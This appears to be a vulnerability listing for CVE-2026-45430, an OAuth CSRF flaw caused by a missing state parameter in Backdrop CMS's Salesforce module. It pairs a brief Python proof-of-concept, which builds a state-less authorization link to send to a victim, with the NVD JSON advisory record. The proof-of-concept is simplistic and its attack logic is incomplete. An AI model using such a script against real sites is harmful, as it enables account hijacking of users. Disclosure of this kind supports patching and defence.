CVE-2026-45430

import requests # Attacker's configuration victim_base_url = "https://target-backdrop-site.com" client_id = "CONSUMER_KEY_FROM_SALESFORCE" redirect_uri = f"{victim_base_url}/salesforce/callback" # The vulnerability lies in the lack of state validation. # An attacker can craft a URL without a valid state or a predictable one. malicious_auth_url = ( "https://login.salesforce.com/services/oauth2/authorize" f"?response_type=code&client_id={client_id}" f"&redirect_uri={redirect_uri}" # Missing or weak state parameter allows CSRF ) print(f"[+] Send this link to the victim: {malicious_auth_url}") print("[+] If victim clicks and authorizes, the account is linked due to missing state check.")

{"cve": {"id": "CVE-2026-45430", "sourceIdentifier": "[email protected]", "published": "2026-05-12T04:16:28.027", "lastModified": "2026-05-12T04:16:28.027", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Salesforce module before 1.x-1.0.1 for Backdrop CMS does not properly use a random state parameter to protect the authorization flow against CSRF attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://backdropcms.org/security/backdrop-sa-contrib-2026-001", "source": "[email protected]"}]}}